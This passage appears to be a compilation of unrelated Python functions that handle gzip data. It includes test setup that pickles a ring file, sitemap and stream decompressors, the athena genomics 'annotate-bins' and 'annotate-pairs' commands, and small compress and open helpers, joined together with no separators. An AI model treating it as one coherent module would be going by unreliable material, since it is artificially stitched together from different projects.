                         'port': sock.getsockname()[1]})
        ring_data = ring.RingData(replica2part2dev_id, devs, 30)
        with closing(GzipFile(ring_file_test, 'wb')) as f:
            pickle.dump(ring_data, f)

    for dev in ring_data.devs:
        _debug('Ring file dev: %s' % dev)

    return obj_sockets
def uncompress(self, sitemapdata):
    """Return the gunzipped contents of ``sitemapdata``.

    ``sitemapdata`` is the raw gzip-compressed payload; it is wrapped in
    the ``StringIO`` buffer imported by this module and decompressed in
    memory. The reader is closed even if decompression fails.
    """
    with GzipFile(fileobj=StringIO(sitemapdata)) as unzipped:
        return unzipped.read()
def gzip_reader(fd, size, url, params):
    """Return ``(stream, size, url)`` with ``fd`` wrapped for gunzipping.

    ``stream`` is a :class:`gzip.GzipFile` reading from ``fd``; ``size``
    and ``url`` are passed through unchanged and ``params`` is not used.
    """
    import gzip
    stream = gzip.GzipFile(fileobj=fd)
    return stream, size, url
def annotatebins(bins, outfile, include_chroms, ranges, track, ucsc_track,
                 actions, track_names, track_list, ucsc_list, ucsc_ref, fasta,
                 snv_mus, no_ucsc_chromsplit, maxfloat, bgzip, quiet):
    """
    Annotate bins

    Collects the local and UCSC tracks (given directly and/or via list
    files), builds the output header from the header of `bins` plus one
    column per track (and `pct_gc` / `snv_mu` when `fasta` / `snv_mus` are
    given), annotates the bins and writes them to `outfile`, optionally
    bgzipping the result.

    Exits with an error message if the number of track names does not match
    the number of tracks.
    """

    # Sanitize & format inputs
    ucsc_chromsplit = not no_ucsc_chromsplit
    track = list(track)
    ucsc_track = list(ucsc_track)
    actions = tuple([a.lower() for a in actions])

    # Parse file with lists of tracks (if provided) and add to track lists
    if track_list is not None:
        supp_tracks, supp_actions, supp_names = mutrate.parse_track_file(
            track_list)
        track = track + supp_tracks
        n_ucsc_tracks = len(ucsc_track)
        if n_ucsc_tracks > 0:
            # Splice the supplementary entries in at position n_ucsc_tracks.
            actions = tuple(list(actions[:n_ucsc_tracks]) + supp_actions
                            + list(actions[n_ucsc_tracks:]))
            track_names = tuple(list(track_names[:n_ucsc_tracks]) + supp_names
                                + list(track_names[n_ucsc_tracks:]))
        else:
            actions = tuple(list(actions) + supp_actions)
            track_names = tuple(list(track_names) + supp_names)

    # Parse file with list of UCSC tracks (if provided and add to track lists)
    if ucsc_list is not None:
        supp_ucsc_tracks, supp_ucsc_actions, supp_ucsc_names = \
            mutrate.parse_track_file(ucsc_list)
        ucsc_track = ucsc_track + supp_ucsc_tracks
        actions = tuple(list(actions) + supp_ucsc_actions)
        track_names = tuple(list(track_names) + supp_ucsc_names)

    # Handle header reformatting
    n_tracks = len(track) + len(ucsc_track)
    if n_tracks != len(track_names):
        err = 'INPUT ERROR: Number of supplied track names ({0}) does not ' + \
              'match number of tracks ({1}).'
        exit(err.format(len(track_names), n_tracks))

    # Read only the first line of the input, closing the file afterwards.
    if 'compressed' in determine_filetype(bins):
        with GzipFile(bins) as fin:
            header = fin.readline().decode('utf-8').rstrip()
    else:
        with open(bins, 'r') as fin:
            header = fin.readline().rstrip()
    if not header.startswith('#'):
        status_msg = '[{0}] athena annotate-bins: No header line detected. ' + \
                     'Adding default header.'
        print(status_msg.format(
            datetime.now().strftime('%b %d %Y @ %H:%M:%S')))
        # The first line is a data row here; every column past the first
        # three gets a default name.
        n_extra_cols = len(header.split('\t')) - 3
        header = make_default_bed_header(n_extra_cols)
    newheader = header + '\t' + '\t'.join(list(track_names))
    if fasta is not None:
        newheader = '\t'.join([newheader, 'pct_gc'])
    if snv_mus is not None:
        newheader = '\t'.join([newheader, 'snv_mu'])

    # Annotate bins
    newbins = mutrate.annotate_bins(bins, include_chroms, ranges, track,
                                    ucsc_track, ucsc_ref, actions, fasta,
                                    snv_mus, maxfloat, ucsc_chromsplit, quiet)

    # Save annotated bins
    if 'compressed' in determine_filetype(outfile):
        # Write uncompressed under the name without its last extension.
        outfile = path.splitext(outfile)[0]
    newbins.saveas(outfile, trackline=newheader)

    # Bgzip bins, if optioned
    if bgzip:
        bgz(outfile)
def gzip(data):
    """Gunzip the bytes ``data`` and return the result decoded as UTF-8.

    Despite its name, this function decompresses its input.
    """
    raw = GzipFile(fileobj=BytesIO(data)).read()
    return raw.decode('utf-8')
def annotatepairs(pairs, outfile, chroms, ranges, track, ucsc_track, actions,
                  track_names, track_list, ucsc_list, ucsc_ref, fasta, binsize,
                  homology_cutoffs, no_ucsc_chromsplit, maxfloat, bgzip, quiet):
    """
    Annotate pairs

    Collects the local and UCSC tracks (given directly and/or via list
    files), builds the output header from the header of `pairs` plus one
    column per track name (and, when `fasta` is given, forward/reverse
    homology columns for each cutoff), annotates the pairs and writes them
    to `outfile`, optionally bgzipping the result.
    """

    # Sanitize & format inputs
    ucsc_chromsplit = not no_ucsc_chromsplit
    tracks = list(track)
    ucsc_tracks = list(ucsc_track)
    actions = tuple([a.lower() for a in actions])
    if len(homology_cutoffs) > 0:
        homology_cutoffs = list(homology_cutoffs)
    else:
        homology_cutoffs = [1.0]

    # Parse file with lists of tracks (if provided) and add to track lists
    if track_list is not None:
        supp_tracks, supp_actions, supp_names = mutrate.parse_track_file(
            track_list)
        tracks = tracks + supp_tracks
        n_ucsc_tracks = len(ucsc_tracks)
        if n_ucsc_tracks > 0:
            # Splice the supplementary entries in at position n_ucsc_tracks.
            actions = tuple(list(actions[:n_ucsc_tracks]) + supp_actions
                            + list(actions[n_ucsc_tracks:]))
            track_names = tuple(list(track_names[:n_ucsc_tracks]) + supp_names
                                + list(track_names[n_ucsc_tracks:]))
        else:
            actions = tuple(list(actions) + supp_actions)
            track_names = tuple(list(track_names) + supp_names)

    # Parse file with list of UCSC tracks (if provided and add to track lists)
    if ucsc_list is not None:
        supp_ucsc_tracks, supp_ucsc_actions, supp_ucsc_names = \
            mutrate.parse_track_file(ucsc_list)
        ucsc_tracks = ucsc_tracks + supp_ucsc_tracks
        actions = tuple(list(actions) + supp_ucsc_actions)
        track_names = tuple(list(track_names) + supp_ucsc_names)

    # Handle header reformatting
    # Read only the first line of the input, closing the file afterwards.
    if 'compressed' in determine_filetype(pairs):
        with GzipFile(pairs) as fin:
            header = fin.readline().decode('utf-8').rstrip()
    else:
        with open(pairs, 'r') as fin:
            header = fin.readline().rstrip()
    if not header.startswith('#'):
        status_msg = '[{0}] athena annotate-pairs: No header line detected. ' + \
                     'Adding default header.'
        print(status_msg.format(
            datetime.now().strftime('%b %d %Y @ %H:%M:%S')))
        # The first line is a data row here; every column past the first
        # three gets a default name.
        n_extra_cols = len(header.split('\t')) - 3
        header = make_default_bed_header(n_extra_cols)
    if len(track_names) > 0:
        newheader = header + '\t' + '\t'.join(list(track_names))
    else:
        newheader = header
    if fasta is not None:
        # Two columns (fwd, rev) per homology cutoff, labelled in percent.
        for k in homology_cutoffs:
            for direction in 'fwd rev'.split():
                newheader += '\t' + 'longest_{}_kmer_{}pct_identity'.format(
                    direction, int(round(100 * k)))

    # Annotate pairs
    newpairs = mutrate.annotate_pairs(pairs, chroms, ranges, tracks,
                                      ucsc_tracks, actions, track_names,
                                      ucsc_ref, fasta, binsize,
                                      homology_cutoffs, ucsc_chromsplit,
                                      maxfloat, quiet)

    # Save annotated bins
    if 'compressed' in determine_filetype(outfile):
        # Write uncompressed under the name without its last extension.
        outfile = path.splitext(outfile)[0]
    newpairs.saveas(outfile, trackline=newheader)

    # Bgzip bins, if optioned
    if bgzip:
        bgz(outfile)
def compress_string(s):
    """Return the bytes ``s`` gzip-compressed at compression level 6.

    The gzip writer is used as a context manager so it is closed (and the
    trailer flushed into the buffer) even if writing raises.
    """
    zbuf = BytesIO()
    with GzipFile(mode='wb', compresslevel=6, fileobj=zbuf) as zfile:
        zfile.write(s)
    return zbuf.getvalue()
def open_file(fname):
    """Open ``fname`` for reading, transparently gunzipping ``*.gz`` files.

    Returns a ``GzipFile`` (yielding bytes) when the name ends in ``.gz``,
    otherwise a regular file object opened with the default mode. The
    caller is responsible for closing the returned object.
    """
    if fname.endswith('.gz'):
        return GzipFile(fname)
    # ``open`` replaces the Python-2-only ``file`` builtin; the two are
    # equivalent on Python 2 and only ``open`` exists on Python 3.
    return open(fname)